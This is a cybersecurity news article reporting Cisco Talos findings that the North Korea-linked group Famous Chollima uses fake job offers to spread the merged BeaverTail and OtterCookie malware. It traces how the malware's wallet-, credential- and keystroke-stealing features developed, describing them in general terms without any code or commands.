A recent report from Cisco Talos reveals that the North Korea-linked hacking group Famous Chollima is leveraging the job market to conduct cyberattacks. The group is utilizing fraudulent job postings to ensnare victims into downloading malicious software that enables the theft of cryptocurrency and user credentials.
Merging Malware Threats
Two malicious software families, known as BeaverTail and OtterCookie, have been identified as combining their functionalities, indicating a strategic shift by attackers to bolster their capabilities for future operations. Cisco Talos observed this malicious campaign after a system breach occurred in an organization based in Sri Lanka. The attack vector starts when unsuspecting individuals install a Trojan-infested application, such as Chessfi, inadvertently executing a command that downloads a concealed malicious package labeled “node-nvm-ssh.”
This particular package executes a sophisticated set of instructions that culminate in the deployment of a disguised file containing the merged code from BeaverTail and OtterCookie.
Evolution of Malware Capabilities
An evolution in the capabilities of the malware has been noted, illustrating a marked increase in its data theft potential. The earlier versions of the malware, cataloged from September to November 2024 (V1), primarily targeted browser profiles. By November 2024 to February 2025 (V2), additional functionality allowed for clipboard content theft, while V3 (February to April 2025) expanded its reach to specific files across all mounted disk drives.
The most alarming development has occurred with the latest OtterCookie version, V5, observed between April and August 2025. This iteration introduces advanced features, including a keylogging module that records every keystroke and a screenshot feature that captures the user’s desktop every four seconds. The gathered keystrokes and images are subsequently uploaded to the attackers’ command and control server.
Targeting Financial Data and Advanced Evasion Techniques
The primary aim of this campaign is the theft of financial data, with particular emphasis on widely-used cryptocurrency browser extensions and wallets. The security of a user’s cryptocurrency holdings is of utmost importance, and OtterCookie specifically targets secure accounts such as MetaMask, Trust Wallet, and Binance Chain Wallet, among others.
Moreover, researchers have observed that the attackers are incorporating essential functions directly into the malware’s core JavaScript code, diminishing the need for supplementary programming languages like Python. This adaptation enhances the malware’s versatility and simplifies the deployment process, particularly for attacks directed at popular browsers like Google Chrome and Brave targeted at stealing cryptocurrency extensions.
This critical research has been disseminated exclusively through Hackread.com, underscoring that North Korea’s cyber strategy is heavily reliant on job-based scams. Previous reports from cybersecurity firms like Silent Push, also highlighted by Hackread.com, indicated that the Lazarus Group has similarly targeted cryptocurrency job seekers using fake companies, such as BlockNovas LLC. Alarmingly, the same BeaverTail and OtterCookie malware found in those prior incidents have now evolved for more sophisticated operations.
